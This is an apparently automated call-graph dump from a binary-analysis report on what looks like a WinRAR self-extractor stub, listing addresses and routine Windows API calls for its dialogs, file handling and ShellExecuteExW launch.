24222 101b568 PeekMessageW 24219->24222 24223 101b583 GetMessageW 24222->24223 24224 101b5bc 24222->24224 24225 101b599 IsDialogMessageW 24223->24225 24226 101b5a8 TranslateMessage DispatchMessageW 24223->24226 24225->24224 24225->24226 24226->24224 25492 10162ca 123 API calls __InternalCxxFrameHandler 24234 101e1d1 14 API calls ___delayLoadHelper2@8 25445 102a3d0 21 API calls 2 library calls 25494 101f4d3 20 API calls 25446 1032bd0 VariantClear 24237 10010d5 24242 1005abd 24237->24242 24243 1005ac7 __EH_prolog 24242->24243 24249 100b505 24243->24249 24245 1005ad3 24255 1005cac GetCurrentProcess GetProcessAffinityMask 24245->24255 24250 100b50f __EH_prolog 24249->24250 24256 100f1d0 82 API calls 24250->24256 24252 100b521 24257 100b61e 24252->24257 24256->24252 24258 100b630 __cftof 24257->24258 24261 10110dc 24258->24261 24264 101109e GetCurrentProcess GetProcessAffinityMask 24261->24264 24265 100b597 24264->24265 24265->24245 24266 101e2d7 24267 101e1db 24266->24267 24268 101e85d ___delayLoadHelper2@8 14 API calls 24267->24268 24268->24267 25496 1020ada 51 API calls 2 library calls 24371 101b7e0 24372 101b7ea __EH_prolog 24371->24372 24539 1001316 24372->24539 24375 101b82a 24377 101b841 24375->24377 24380 101b838 24375->24380 24381 101b89b 24375->24381 24376 101bf0f 24604 101d69e 24376->24604 24385 101b878 24380->24385 24386 101b83c 24380->24386 24384 101b92e GetDlgItemTextW 24381->24384 24390 101b8b1 24381->24390 24382 101bf38 24387 101bf41 SendDlgItemMessageW 24382->24387 24388 101bf52 GetDlgItem SendMessageW 24382->24388 24383 101bf2a SendMessageW 24383->24382 24384->24385 24389 101b96b 24384->24389 24385->24377 24393 101b95f KiUserCallbackDispatcher 24385->24393 24386->24377 24391 100e617 53 API calls 24386->24391 24387->24388 24622 101a64d GetCurrentDirectoryW 24388->24622 24394 101b980 GetDlgItem 24389->24394 24537 101b974 24389->24537 24395 100e617 53 API calls 24390->24395 24396 101b85b 24391->24396 24393->24377 24398 101b994 SendMessageW SendMessageW 24394->24398 24399 101b9b7 SetFocus 24394->24399 24400 101b8ce SetDlgItemTextW 24395->24400 24642 100124f SHGetMalloc 24396->24642 24397 101bf82 GetDlgItem 24402 101bfa5 SetWindowTextW 24397->24402 24403 101bf9f 24397->24403 24398->24399 24404 101b9c7 24399->24404 24417 101b9e0 24399->24417 24405 101b8d9 24400->24405 24623 101abab GetClassNameW 24402->24623 24403->24402 24406 100e617 53 API calls 24404->24406 24405->24377 24410 101b8e6 GetMessageW 24405->24410 24411 101b9d1 24406->24411 24407 101b862 24407->24377 24416 101c1fc SetDlgItemTextW 24407->24416 24408 101be55 24412 100e617 53 API calls 24408->24412 24410->24377 24414 101b8fd IsDialogMessageW 24410->24414 24643 101d4d4 24411->24643 24418 101be65 SetDlgItemTextW 24412->24418 24414->24405 24420 101b90c TranslateMessage DispatchMessageW 24414->24420 24416->24377 24423 100e617 53 API calls 24417->24423 24421 101be79 24418->24421 24420->24405 24425 100e617 53 API calls 24421->24425 24424 101ba17 24423->24424 24431 1004092 _swprintf 51 API calls 24424->24431 24458 101be9c _wcslen 24425->24458 24426 101bff0 24430 101c020 24426->24430 24433 100e617 53 API calls 24426->24433 24427 101b9d9 24549 100a0b1 24427->24549 24428 101c73f 97 API calls 24428->24426 24434 101c0d8 24430->24434 24439 101c73f 97 API calls 24430->24439 24435 101ba29 24431->24435 24438 101c003 SetDlgItemTextW 24433->24438 24440 101c18b 24434->24440 24473 101c169 24434->24473 24486 100e617 53 API calls 24434->24486 24441 101d4d4 16 API calls 24435->24441 24436 101ba68 GetLastError 24437 101ba73 24436->24437 24555 101ac04 SetCurrentDirectoryW 24437->24555 24444 100e617 53 API calls 24438->24444 24446 101c03b 24439->24446 24442 101c194 EnableWindow 24440->24442 24443 101c19d 24440->24443 24441->24427 24442->24443 24447 101c1ba 24443->24447 24661 10012d3 GetDlgItem EnableWindow 24443->24661 24448 101c017 SetDlgItemTextW 24444->24448 24456 101c04d 24446->24456 24469 101c072 24446->24469 24453 101c1e1 24447->24453 24462 101c1d9 SendMessageW 24447->24462 24448->24430 24449 101ba87 24454 101ba9e 24449->24454 24455 101ba90 GetLastError 24449->24455 24450 100e617 53 API calls 24450->24377 24451 101c0cb 24459 101c73f 97 API calls 24451->24459 24453->24377 24463 100e617 53 API calls 24453->24463 24464 101bb20 24454->24464 24465 101baae GetTickCount 24454->24465 24515 101bb11 24454->24515 24455->24454 24659 1019ed5 32 API calls 24456->24659 24457 101c1b0 24662 10012d3 GetDlgItem EnableWindow 24457->24662 24466 100e617 53 API calls 24458->24466 24487 101beed 24458->24487 24459->24434 24462->24453 24463->24407 24474 101bcfb 24464->24474 24475 101bcf1 24464->24475 24476 101bb39 GetModuleFileNameW 24464->24476 24471 1004092 _swprintf 51 API calls 24465->24471 24472 101bed0 24466->24472 24467 101bd56 24564 10012f1 GetDlgItem ShowWindow 24467->24564 24468 101c066 24468->24469 24469->24451 24484 101c73f 97 API calls 24469->24484 24479 101bac7 24471->24479 24480 1004092 _swprintf 51 API calls 24472->24480 24660 1019ed5 32 API calls 24473->24660 24477 100e617 53 API calls 24474->24477 24475->24385 24475->24474 24653 100f28c 82 API calls 24476->24653 24483 101bd05 24477->24483 24478 101bd66 24565 10012f1 GetDlgItem ShowWindow 24478->24565 24556 100966e 24479->24556 24480->24487 24491 1004092 _swprintf 51 API calls 24483->24491 24492 101c0a0 24484->24492 24486->24434 24487->24450 24488 101c188 24488->24440 24489 101bb5f 24490 1004092 _swprintf 51 API calls 24489->24490 24494 101bb81 CreateFileMappingW 24490->24494 24495 101bd23 24491->24495 24492->24451 24496 101c0a9 DialogBoxParamW 24492->24496 24493 101bd70 24497 100e617 53 API calls 24493->24497 24499 101bbe3 GetCommandLineW 24494->24499 24531 101bc60 __InternalCxxFrameHandler 24494->24531 24508 100e617 53 API calls 24495->24508 24496->24385 24496->24451 24500 101bd7a SetDlgItemTextW 24497->24500 24502 101bbf4 24499->24502 24566 10012f1 GetDlgItem ShowWindow 24500->24566 24501 101baed 24505 101baff 24501->24505 24506 101baf4 GetLastError 24501->24506 24654 101b425 SHGetMalloc 24502->24654 24503 101bc6b ShellExecuteExW 24529 101bc88 24503->24529 24510 100959a 80 API calls 24505->24510 24506->24505 24512 101bd3d 24508->24512 24509 101bd8c SetDlgItemTextW GetDlgItem 24513 101bdc1 24509->24513 24514 101bda9 GetWindowLongW SetWindowLongW 24509->24514 24510->24515 24511 101bc10 24655 101b425 SHGetMalloc 24511->24655 24567 101c73f 24513->24567 24514->24513 24515->24464 24515->24467 24518 101bc1c 24656 101b425 SHGetMalloc 24518->24656 24521 101bccb 24521->24475 24527 101bce1 UnmapViewOfFile CloseHandle 24521->24527 24522 101c73f 97 API calls 24524 101bddd 24522->24524 24523 101bc28 24657 100f3fa 82 API calls 2 library calls 24523->24657 24592 101da52 24524->24592 24527->24475 24528 101bc3f MapViewOfFile 24528->24531 24529->24521 24532 101bcb7 Sleep 24529->24532 24531->24503 24532->24521 24532->24529 24533 101c73f 97 API calls 24536 101be03 24533->24536 24534 101be2c 24658 10012d3 GetDlgItem EnableWindow 24534->24658 24536->24534 24538 101c73f 97 API calls 24536->24538 24537->24385 24537->24408 24538->24534 24540 1001378 24539->24540 24541 100131f 24539->24541 24664 100e2c1 GetWindowLongW SetWindowLongW 24540->24664 24542 1001385 24541->24542 24663 100e2e8 62 API calls 2 library calls 24541->24663 24542->24375 24542->24376 24542->24377 24545 1001341 24545->24542 24546 1001354 GetDlgItem 24545->24546 24546->24542 24547 1001364 24546->24547 24547->24542 24548 100136a SetWindowTextW 24547->24548 24548->24542 24552 100a0bb 24549->24552 24550 100a14c 24551 100a2b2 8 API calls 24550->24551 24553 100a175 24550->24553 24551->24553 24552->24550 24552->24553 24665 100a2b2 24552->24665 24553->24436 24553->24437 24555->24449 24557 1009678 24556->24557 24558 10096d5 CreateFileW 24557->24558 24559 10096c9 24557->24559 24558->24559 24560 100bb03 GetCurrentDirectoryW 24559->24560 24561 100971f 24559->24561 24562 1009704 24560->24562 24561->24501 24562->24561 24563 1009708 CreateFileW 24562->24563 24563->24561 24564->24478 24565->24493 24566->24509 24568 101c749 __EH_prolog 24567->24568 24569 101bdcf 24568->24569 24570 101b314 ExpandEnvironmentStringsW 24568->24570 24569->24522 24577 101c780 _wcslen _wcsrchr 24570->24577 24572 101b314 ExpandEnvironmentStringsW 24572->24577 24573 101ca67 SetWindowTextW 24573->24577 24576 1023e3e 22 API calls 24576->24577 24577->24569 24577->24572 24577->24573 24577->24576 24579 101c855 SetFileAttributesW 24577->24579 24585 101cc31 GetDlgItem SetWindowTextW SendMessageW 24577->24585 24587 101cc71 SendMessageW 24577->24587 24686 1011fbb CompareStringW 24577->24686 24687 101a64d GetCurrentDirectoryW 24577->24687 24689 100a5d1 6 API calls 24577->24689 24690 100a55a FindClose 24577->24690 24691 101b48e 76 API calls 2 library calls 24577->24691 24580 101c90f GetFileAttributesW 24579->24580 24591 101c86f __cftof _wcslen 24579->24591 24580->24577 24583 101c921 DeleteFileW 24580->24583 24583->24577 24584 101c932 24583->24584 24586 1004092 _swprintf 51 API calls 24584->24586 24585->24577 24588 101c952 GetFileAttributesW 24586->24588 24587->24577 24588->24584 24589 101c967 MoveFileW 24588->24589 24589->24577 24590 101c97f MoveFileExW 24589->24590 24590->24577 24591->24577 24591->24580 24688 100b991 51 API calls 2 library calls 24591->24688 24593 101da5c __EH_prolog 24592->24593 24692 1010659 24593->24692 24595 101da8d 24696 1005b3d 24595->24696 24597 101daab 24700 1007b0d 24597->24700 24601 101dafe 24716 1007b9e 24601->24716 24603 101bdee 24603->24533 24605 101d6a8 24604->24605 24606 101a5c6 4 API calls 24605->24606 24607 101d6ad 24606->24607 24608 101d6b5 GetWindow 24607->24608 24609 101bf15 24607->24609 24608->24609 24612 101d6d5 24608->24612 24609->24382 24609->24383 24610 101d6e2 GetClassNameW 25181 1011fbb CompareStringW 24610->25181 24612->24609 24612->24610 24613 101d706 GetWindowLongW 24612->24613 24614 101d76a GetWindow 24612->24614 24613->24614 24615 101d716 SendMessageW 24613->24615 24614->24609 24614->24612 24615->24614 24616 101d72c GetObjectW 24615->24616 25182 101a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24616->25182 24618 101d743 25183 101a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24618->25183 25184 101a80c 8 API calls 24618->25184 24621 101d754 SendMessageW DeleteObject 24621->24614 24622->24397 24624 101abcc 24623->24624 24626 101abf1 24623->24626 25185 1011fbb CompareStringW 24624->25185 24629 101b093 24626->24629 24627 101abdf 24627->24626 24628 101abe3 FindWindowExW 24627->24628 24628->24626 24630 101b09d __EH_prolog 24629->24630 24631 10013dc 84 API calls 24630->24631 24632 101b0bf 24631->24632 25186 1001fdc 24632->25186 24635 101b0d9 24637 1001692 86 API calls 24635->24637 24636 101b0eb 24638 10019af 128 API calls 24636->24638 24639 101b0e4 24637->24639 24641 101b10d __InternalCxxFrameHandler ___std_exception_copy 24638->24641 24639->24426 24639->24428 24640 1001692 86 API calls 24640->24639 24641->24640 24642->24407 24644 101b568 5 API calls 24643->24644 24645 101d4e0 GetDlgItem 24644->24645 24646 101d536 SendMessageW SendMessageW 24645->24646 24647 101d502 24645->24647 24648 101d591 SendMessageW SendMessageW SendMessageW 24646->24648 24649 101d572 24646->24649 24650 101d50d ShowWindow SendMessageW SendMessageW 24647->24650 24651 101d5c4 SendMessageW 24648->24651 24652 101d5e7 SendMessageW 24648->24652 24649->24648 24650->24646 24651->24652 24652->24427 24653->24489 24654->24511 24655->24518 24656->24523 24657->24528 24658->24537 24659->24468 24660->24488 24661->24457 24662->24447 24663->24545 24664->24542 24666 100a2bf 24665->24666 24667 100a2e3 24666->24667 24668 100a2d6 CreateDirectoryW 24666->24668 24669 100a231 3 API calls 24667->24669 24668->24667 24670 100a316 24668->24670 24671 100a2e9 24669->24671 24673 100a325 24670->24673 24678 100a4ed 24670->24678 24672 100a329 GetLastError 24671->24672 24674 100bb03 GetCurrentDirectoryW 24671->24674 24672->24673 24673->24552 24676 100a2ff 24674->24676 24676->24672 24677 100a303 CreateDirectoryW 24676->24677 24677->24670 24677->24672 24679 101ec50 24678->24679 24680 100a4fa SetFileAttributesW 24679->24680 24681 100a510 24680->24681 24682 100a53d 24680->24682 24683 100bb03 GetCurrentDirectoryW 24681->24683 24682->24673 24684 100a524 24683->24684 24684->24682 24685 100a528 SetFileAttributesW 24684->24685 24685->24682 24686->24577 24687->24577 24688->24591 24689->24577 24690->24577 24691->24577 24693 1010666 _wcslen 24692->24693 24720 10017e9 24693->24720 24695 101067e 24695->24595 24697 1010659 _wcslen 24696->24697 24698 10017e9 78 API calls 24697->24698 24699 101067e 24698->24699 24699->24597 24701 1007b17 __EH_prolog 24700->24701 24737 100ce40 24701->24737 24703 1007b32 24704 101eb38 8 API calls 24703->24704 24705 1007b5c 24704->24705 24743 1014a76 24705->24743 24708 1007c7d 24709 1007c87 24708->24709 24711 1007cf1 24709->24711 24772 100a56d 24709->24772 24713 1007d50 24711->24713 24750 1008284 24711->24750 24712 1007d92 24712->24601 24713->24712 24778 100138b 74 API calls 24713->24778 24717 1007bac 24716->24717 24719 1007bb3 24716->24719 24718 1012297 86 API calls 24717->24718 24718->24719 24722 10017ff 24720->24722 24732 100185a __InternalCxxFrameHandler 24720->24732 24721 1001828 24723 1001887 24721->24723 24729 1001847 ___std_exception_copy 24721->24729 24722->24721 24733 1006c36 76 API calls __vswprintf_c_l 24722->24733 24725 1023e3e 22 API calls 24723->24725 24727 100188e 24725->24727 24726 100181e 24734 1006ca7 75 API calls 24726->24734 24727->24732 24736 1006ca7 75 API calls 24727->24736 24729->24732 24735 1006ca7 75 API calls 24729->24735 24732->24695 24733->24726 24734->24721 24735->24732 24736->24732 24738 100ce4a __EH_prolog 24737->24738 24739 101eb38 8 API calls 24738->24739 24740 100ce8d 24739->24740 24741 101eb38 8 API calls 24740->24741 24742 100ceb1 24741->24742 24742->24703 24744 1014a80 __EH_prolog 24743->24744 24745 101eb38 8 API calls 24744->24745 24746 1014a9c 24745->24746 24747 1007b8b 24746->24747 24749 1010e46 80 API calls 24746->24749 24747->24708 24749->24747 24751 100828e __EH_prolog 24750->24751 24779 10013dc 24751->24779 24753 10082aa 24754 10082bb 24753->24754 24922 1009f42 24753->24922 24757 10082f2 24754->24757 24787 1001a04 24754->24787 24918 1001692 24757->24918 24760 1008389 24806 1008430 24760->24806 24763 10083e8 24814 1001f6d 24763->24814 24766 10082ee 24766->24757 24766->24760 24770 100a56d 7 API calls 24766->24770 24926 100c0c5 CompareStringW _wcslen 24766->24926 24768 10083f3 24768->24757 24818 1003b2d 24768->24818 24830 100848e 24768->24830 24770->24766 24773 100a582 24772->24773 24777 100a5b0 24773->24777 25170 100a69b 24773->25170 24775 100a592 24776 100a597 FindClose 24775->24776 24775->24777 24776->24777 24777->24709 24778->24712 24780 10013e1 __EH_prolog 24779->24780 24781 100ce40 8 API calls 24780->24781 24782 1001419 24781->24782 24783 101eb38 8 API calls 24782->24783 24786 1001474 __cftof 24782->24786 24784 1001461 24783->24784 24785 100b505 84 API calls 24784->24785 24784->24786 24785->24786 24786->24753 24788 1001a0e __EH_prolog 24787->24788 24800 1001a61 24788->24800 24802 1001b9b 24788->24802 24927 10013ba 24788->24927 24790 1001bc7 24930 100138b 74 API calls 24790->24930 24793 1003b2d 101 API calls 24797 1001c12 24793->24797 24794 1001bd4 24794->24793 24794->24802 24795 1001c5a 24799 1001c8d 24795->24799 24795->24802 24931 100138b 74 API calls 24795->24931 24797->24795 24798 1003b2d 101 API calls 24797->24798 24798->24797 24799->24802 24805 1009e80 79 API calls 24799->24805 24800->24790 24800->24794 24800->24802 24801 1003b2d 101 API calls 24803 1001cde 24801->24803 24802->24766 24803->24801 24803->24802 24804 1009e80 79 API calls 24804->24800 24805->24803 24949 100cf3d 24806->24949 24808 1008440 24953 10113d2 GetSystemTime SystemTimeToFileTime 24808->24953 24810 10083a3 24810->24763 24811 1011b66 24810->24811 24958 101de6b 24811->24958 24815 1001f72 __EH_prolog 24814->24815 24817 1001fa6 24815->24817 24966 10019af 24815->24966 24817->24768 24819 1003b39 24818->24819 24820 1003b3d 24818->24820 24819->24768 24829 1009e80 79 API calls 24820->24829 24821 1003b4f 24822 1003b78 24821->24822 24823 1003b6a 24821->24823 25097 100286b 101 API calls 3 library calls 24822->25097 24825 1003baa 24823->24825 25096 10032f7 89 API calls 2 library calls 24823->25096 24825->24768 24827 1003b76 24827->24825 25098 10020d7 74 API calls 24827->25098 24829->24821 24831 1008498 __EH_prolog 24830->24831 24834 10084d5 24831->24834 24841 1008513 24831->24841 25123 1018c8d 103 API calls 24831->25123 24833 10084f5 24835 10084fa 24833->24835 24836 100851c 24833->24836 24834->24833 24839 100857a 24834->24839 24834->24841 24835->24841 25124 1007a0d 152 API calls 24835->25124 24836->24841 25125 1018c8d 103 API calls 24836->25125 24839->24841 25099 1005d1a 24839->25099 24841->24768 24842 1008605 24842->24841 25105 1008167 24842->25105 24845 1008797 24846 100a56d 7 API calls 24845->24846 24849 1008802 24845->24849 24846->24849 24848 100d051 82 API calls 24855 100885d 24848->24855 25111 1007c0d 24849->25111 24850 1008992 24851 1008a5f 24850->24851 24858 10089e1 24850->24858 24856 1008ab6 24851->24856 24868 1008a6a 24851->24868 24852 100898b 25128 1002021 74 API calls 24852->25128 24855->24841 24855->24848 24855->24850 24855->24852 25126 1008117 84 API calls 24855->25126 25127 1002021 74 API calls 24855->25127 24859 1008a4c 24856->24859 25131 1007fc0 97 API calls 24856->25131 24857 1008ab4 24860 100959a 80 API calls 24857->24860 24858->24859 24861 100a231 3 API calls 24858->24861 24865 1008b14 24858->24865 24859->24857 24859->24865 24860->24841 24864 1008a19 24861->24864 24863 100959a 80 API calls 24863->24841 24864->24859 25129 10092a3 97 API calls 24864->25129 24877 1008b82 24865->24877 24906 1009105 24865->24906 25132 10098bc 24865->25132 24866 100ab1a 8 API calls 24869 1008bd1 24866->24869 24868->24857 25130 1007db2 101 API calls 24868->25130 24872 100ab1a 8 API calls 24869->24872 24889 1008be7 24872->24889 24875 1008b70 25136 1006e98 77 API calls 24875->25136 24877->24866 24878 1008cbc 24879 1008e40 24878->24879 24880 1008d18 24878->24880 24882 1008e52 24879->24882 24883 1008e66 24879->24883 24904 1008d49 24879->24904 24881 1008d8a 24880->24881 24884 1008d28 24880->24884 24890 1008167 19 API calls 24881->24890 24885 1009215 123 API calls 24882->24885 24886 1013377 75 API calls 24883->24886 24887 1008d6e 24884->24887 24893 1008d37 24884->24893 24885->24904 24888 1008e7f 24886->24888 24887->24904 25139 10077b8 111 API calls 24887->25139 25142 1013020 123 API calls 24888->25142 24889->24878 24895 100981a 79 API calls 24889->24895 24898 1008c93 24889->24898 24897 1008dbd 24890->24897 25138 1002021 74 API calls 24893->25138 24895->24898 24899 1008df5 24897->24899 24900 1008de6 24897->24900 24897->24904 24898->24878 25137 1009a3c 82 API calls 24898->25137 25141 1009155 93 API calls __EH_prolog 24899->25141 25140 1007542 85 API calls 24900->25140 24907 1008f85 24904->24907 25143 1002021 74 API calls 24904->25143 24905 1009090 24905->24906 24908 100a4ed 3 API calls 24905->24908 24906->24863 24907->24905 24907->24906 24909 100903e 24907->24909 25117 1009f09 SetEndOfFile 24907->25117 24910 10090eb 24908->24910 25118 1009da2 24909->25118 24910->24906 25144 1002021 74 API calls 24910->25144 24913 1009085 24915 1009620 77 API calls 24913->24915 24915->24905 24916 10090fb 25145 1006dcb 76 API calls 24916->25145 24919 10016a4 24918->24919 25161 100cee1 24919->25161 24923 1009f59 24922->24923 24925 1009f63 24923->24925 25169 1006d0c 78 API calls 24923->25169 24925->24754 24926->24766 24932 1001732 24927->24932 24929 10013d6 24929->24804 24930->24802 24931->24799 24933 1001748 24932->24933 24944 10017a0 __InternalCxxFrameHandler 24932->24944 24934 1001771 24933->24934 24945 1006c36 76 API calls __vswprintf_c_l 24933->24945 24936 10017c7 24934->24936 24937 100178d ___std_exception_copy 24934->24937 24939 1023e3e 22 API calls 24936->24939 24937->24944 24947 1006ca7 75 API calls 24937->24947 24938 1001767 24946 1006ca7 75 API calls 24938->24946 24941 10017ce 24939->24941 24941->24944 24948 1006ca7 75 API calls 24941->24948 24944->24929 24945->24938 24946->24934 24947->24944 24948->24944 24950 100cf4d 24949->24950 24952 100cf54 24949->24952 24954 100981a 24950->24954 24952->24808 24953->24810 24955 1009833 24954->24955 24957 1009e80 79 API calls 24955->24957 24956 1009865 24956->24952 24957->24956 24959 101de78 24958->24959 24960 100e617 53 API calls 24959->24960 24961 101de9b 24960->24961 24962 1004092 _swprintf 51 API calls 24961->24962 24963 101dead 24962->24963 24964 101d4d4 16 API calls 24963->24964 24965 1011b7c 24964->24965 24965->24763 24967 10019bf 24966->24967 24969 10019bb 24966->24969 24970 10018f6 24967->24970 24969->24817 24971 1001945 24970->24971 24972 1001908 24970->24972 24978 1003fa3 24971->24978 24973 1003b2d 101 API calls 24972->24973 24976 1001928 24973->24976 24976->24969 24982 1003fac 24978->24982 24979 1003b2d 101 API calls 24979->24982 24980 1001966 24980->24976 24983 1001e50 24980->24983 24982->24979 24982->24980 24995 1010e08 24982->24995 24984 1001e5a __EH_prolog 24983->24984 25003 1003bba 24984->25003 24986 1001e84 24987 1001732 78 API calls 24986->24987 24991 1001f0b 24986->24991 24988 1001e9b 24987->24988 25031 10018a9 78 API calls 24988->25031 24990 1001eb3 24993 1001ebf _wcslen 24990->24993 25032 1011b84 MultiByteToWideChar 24990->25032 24991->24976 25033 10018a9 78 API calls 24993->25033 24996 1010e0f 24995->24996 24998 1010e2a 24996->24998 25001 1006c31 RaiseException _com_raise_error 24996->25001 24999 1010e3b SetThreadExecutionState 24998->24999 25002 1006c31 RaiseException _com_raise_error 24998->25002 24999->24982 25001->24998 25002->24999 25004 1003bc4 __EH_prolog 25003->25004 25005 1003bf6 25004->25005 25006 1003bda 25004->25006 25008 1003e51 25005->25008 25011 1003c22 25005->25011 25059 100138b 74 API calls 25006->25059 25076 100138b 74 API calls 25008->25076 25010 1003be5 25010->24986 25011->25010 25034 1013377 25011->25034 25013 1003ca3 25014 1003d2e 25013->25014 25030 1003c9a 25013->25030 25062 100d051 25013->25062 25044 100ab1a 25014->25044 25015 1003c9f 25015->25013 25061 10020bd 78 API calls 25015->25061 25017 1003c71 25017->25013 25017->25015 25018 1003c8f 25017->25018 25060 100138b 74 API calls 25018->25060 25020 1003d41 25024 1003dd7 25020->25024 25025 1003dc7 25020->25025 25068 1013020 123 API calls 25024->25068 25048 1009215 25025->25048 25028 1003dd5 25028->25030 25069 1002021 74 API calls 25028->25069 25070 1012297 25030->25070 25031->24990 25032->24993 25033->24991 25035 101338c 25034->25035 25037 1013396 ___std_exception_copy 25034->25037 25077 1006ca7 75 API calls 25035->25077 25038 10134c6 25037->25038 25039 101341c 25037->25039 25043 1013440 __cftof 25037->25043 25079 102238d RaiseException 25038->25079 25078 10132aa 75 API calls 3 library calls 25039->25078 25042 10134f2 25043->25017 25045 100ab28 25044->25045 25046 100ab32 25044->25046 25047 101eb38 8 API calls 25045->25047 25046->25020 25047->25046 25049 100921f __EH_prolog 25048->25049 25080 1007c64 25049->25080 25052 10013ba 78 API calls 25053 1009231 25052->25053 25083 100d114 25053->25083 25055 100928a 25055->25028 25057 100d114 118 API calls 25058 1009243 25057->25058 25058->25055 25058->25057 25092 100d300 97 API calls __InternalCxxFrameHandler 25058->25092 25059->25010 25060->25030 25061->25013 25063 100d072 25062->25063 25064 100d084 25062->25064 25093 100603a 82 API calls 25063->25093 25094 100603a 82 API calls 25064->25094 25067 100d07c 25067->25014 25068->25028 25069->25030 25071 10122a1 25070->25071 25072 10122ba 25071->25072 25075 10122ce 25071->25075 25095 1010eed 86 API calls 25072->25095 25074 10122c1 25074->25075 25076->25010 25077->25037 25078->25043 25079->25042 25081 100b146 GetVersionExW 25080->25081 25082 1007c69 25081->25082 25082->25052 25087 100d12a __InternalCxxFrameHandler 25083->25087 25084 100d29a 25085 100d2ce 25084->25085 25086 100d0cb 6 API calls 25084->25086 25088 1010e08 SetThreadExecutionState RaiseException 25085->25088 25086->25085 25087->25084 25089 1018c8d 103 API calls 25087->25089 25090 100d291 25087->25090 25091 100ac05 91 API calls 25087->25091 25088->25090 25089->25087 25090->25058 25091->25087 25092->25058 25093->25067 25094->25067 25095->25074 25096->24827 25097->24827 25098->24825 25100 1005d2a 25099->25100 25146 1005c4b 25100->25146 25103 1005d5d 25104 1005d95 25103->25104 25151 100b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25103->25151 25104->24842 25107 1008186 25105->25107 25106 1008232 25157 1011fac CharUpperW 25106->25157 25107->25106 25158 100be5e 19 API calls __InternalCxxFrameHandler 25107->25158 25110 100823b 25110->24845 25112 1007c22 25111->25112 25113 1007c5a 25112->25113 25159 1006e7a 74 API calls 25112->25159 25113->24855 25115 1007c52 25160 100138b 74 API calls 25115->25160 25117->24909 25119 1009db3 25118->25119 25122 1009dc2 25118->25122 25120 1009db9 FlushFileBuffers 25119->25120 25119->25122 25120->25122 25121 1009e3f SetFileTime 25121->24913 25122->25121 25123->24834 25124->24841 25125->24841 25126->24855 25127->24855 25128->24850 25129->24859 25130->24857 25131->24859 25133 1008b5a 25132->25133 25134 10098c5 GetFileType 25132->25134 25133->24877 25135 1002021 74 API calls 25133->25135 25134->25133 25135->24875 25136->24877 25137->24878 25138->24904 25139->24904 25140->24904 25141->24904 25142->24904 25143->24907 25144->24916 25145->24906 25152 1005b48 25146->25152 25148 1005c6c 25148->25103 25150 1005b48 2 API calls 25150->25148 25151->25103 25155 1005b52 25152->25155 25153 1005c3a 25153->25148 25153->25150 25155->25153 25156 100b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25155->25156 25156->25155 25157->25110 25158->25106 25159->25115 25160->25113 25162 100cef2 25161->25162 25167 100a99e 86 API calls 25162->25167 25164 100cf24 25168 100a99e 86 API calls 25164->25168 25166 100cf2f 25167->25164 25168->25166 25169->24925 25171 100a6a8 25170->25171 25172 100a6c1 FindFirstFileW 25171->25172 25173 100a727 FindNextFileW 25171->25173 25175 100a6d0 25172->25175 25180 100a709 25172->25180 25174 100a732 GetLastError 25173->25174 25173->25180 25174->25180 25176 100bb03 GetCurrentDirectoryW 25175->25176 25177 100a6e0 25176->25177 25178 100a6e4 FindFirstFileW 25177->25178 25179 100a6fe GetLastError 25177->25179 25178->25179 25178->25180 25179->25180 25180->24775 25181->24612 25182->24618 25183->24618 25184->24621 25185->24627 25187 1009f42 78 API calls 25186->25187 25188 1001fe8 25187->25188 25189 1001a04 101 API calls 25188->25189 25192 1002005 25188->25192 25190 1001ff5 25189->25190 25190->25192 25193 100138b 74 API calls 25190->25193 25192->24635 25192->24636 25193->25192 25194 10013e1 84 API calls 2 library calls 25448 10121e0 26 API calls std::bad_exception::bad_exception 25497 10194e0 GetClientRect 25498 101f2e0 46 API calls __RTC_Initialize 25499 102bee0 GetCommandLineA GetCommandLineW 25196 101eae7 25197 101eaf1 25196->25197 25198 101e85d ___delayLoadHelper2@8 14 API calls 25197->25198 25199 101eafe 25198->25199 25500 101f4e7 29 API calls _abort 25450 100f1e8 FreeLibrary 25452 10095f0 80 API calls 25453 101fd4f 9 API calls 2 library calls 25501 1005ef0 82 API calls 25355 10298f0 25363 102adaf 25355->25363 25359 102990c 25360 1029919 25359->25360 25371 1029920 11 API calls 25359->25371 25362 1029904 25364 102ac98 __dosmaperr 5 API calls 25363->25364 25365 102add6 25364->25365 25366 102adee TlsAlloc 25365->25366 25367 102addf 25365->25367 25366->25367 25368 101fbbc CatchGuardHandler 5 API calls 25367->25368 25369 10298fa 25368->25369 25369->25362 25370 1029869 20 API calls 2 library calls 25369->25370 25370->25359 25371->25362 25372 102abf0 25373 102abfb 25372->25373 25375 102ac24 25373->25375 25376 102ac20 25373->25376 25378 102af0a 25373->25378 25385 102ac50 DeleteCriticalSection 25375->25385 25379 102ac98 __dosmaperr 5 API calls 25378->25379 25380 102af31 25379->25380 25381 102af4f InitializeCriticalSectionAndSpinCount 25380->25381 25384 102af3a 25380->25384 25381->25384 25382 101fbbc CatchGuardHandler 5 API calls 25383 102af66 25382->25383 25383->25373 25384->25382 25385->25376 25502 10288f0 7 API calls ___scrt_uninitialize_crt 25504 1022cfb 38 API calls 4 library calls

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 01010863: GetModuleHandleW.KERNEL32(kernel32), ref: 0101087C
                                                                                      • Part of subcall function 01010863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0101088E
                                                                                      • Part of subcall function 01010863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 010108BF
                                                                                      • Part of subcall function 0101A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0101A655
                                                                                      • Part of subcall function 0101AC16: OleInitialize.OLE32(00000000), ref: 0101AC2F
                                                                                      • Part of subcall function 0101AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0101AC66
                                                                                      • Part of subcall function 0101AC16: SHGetMalloc.SHELL32(01048438), ref: 0101AC70
                                                                                    • GetCommandLineW.KERNEL32 ref: 0101DF5C
                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0101DF83
                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0101DF94
                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0101DFCE
